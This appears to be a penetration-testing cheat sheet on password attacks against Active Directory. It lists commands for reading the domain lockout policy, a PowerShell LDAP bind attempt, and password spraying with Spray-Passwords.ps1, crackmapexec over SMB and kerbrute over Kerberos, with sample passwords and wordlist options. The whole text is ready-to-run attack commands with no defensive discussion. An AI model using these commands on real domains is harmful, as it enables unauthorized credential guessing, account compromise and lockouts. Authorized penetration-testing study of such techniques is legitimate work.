2. Password Attacks


Enumerate account policy:

net accounts

Manual LDAP Password Attack:

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "<user>", "<password>")

Automatic LDAP Attack with Spray-Passwords:

.\Spray-Passwords.ps1 -Pass Nexus123! -Admin

#Multiple passwords: -Pass 'Password1,Password2'
#Download wordlist: -Url <url>

SMB Password Attack with crackmapexec:

sudo crackmapexec smb <ip-on-domain> -u users.txt -p 'Nexus123!' -d <domain> --continue-on-success

Kerberos TGT Attack with kerbrute:

.\kerbrute_windows_amd64.exe passwordspray -d <domain> .\usernames.txt "password123!"